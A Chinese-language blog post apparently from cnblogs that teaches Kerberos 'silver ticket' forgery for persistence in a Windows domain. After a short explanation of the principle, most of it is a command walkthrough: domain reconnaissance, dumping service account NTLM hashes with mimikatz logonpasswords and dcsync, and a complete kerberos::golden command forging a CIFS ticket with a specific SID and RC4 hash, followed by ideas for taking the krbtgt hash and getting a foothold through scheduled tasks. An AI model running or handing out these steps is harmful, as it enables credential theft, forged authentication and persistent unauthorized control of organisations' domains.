白银票据权限维持
目录一、服务账号介绍
服务账号就是计算机名字+$用来管理服务的账号
二、白银票据原理
如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。 在Kerberos认证的第5步,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问 server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。
三、实验前提
已经控制了域名并且使用域管理员登录或者提权的system。
条件如下:
1.域名
2.域sid
3.目标服务器名
4.可利用的服务
5.服务账号的NTML哈希
6.需要伪造的用户名(这个可以随意)
四、实验步骤
1、获取关键信息
shell whoami /user 获取域名和SID
shell net config workstation 获取完整域名
shell wmic useraccount list brief 获取域名和SID
shell net time /domain 获取域主机名
2、获取服务账号的NTLM哈希值
mimikatz sekurlsa::logonpasswords
mimikatz lsadump::dcsync /domain:candada.com /user:DC$(主机名$)
3、伪造票据
mimikatz kerberos::tgt 查票
mimikatz kerberos::purge 清票
shell klist 查票
shell klist purge 清票
mimikatz kerberos::golden /domain:candada.com /sid:S-1-5-21-3368079911-2200516951-1212899923 /target:DC.candada.com /service:cifs /rc4:3a67aaaf095a99cbebd4e8d91d1ba46f /user:test /ptt
4、利用思路:
(1)可以利用ldap服务去获取krbtgt的NTLM哈希,利用黄金票据+计划任务上线
(2)可以利用cifs服务+host服务+计划任务上线
标签:shell,服务,账号,mimikatz,白银,票据,权限 From: https://www.cnblogs.com/candada/p/17491028.html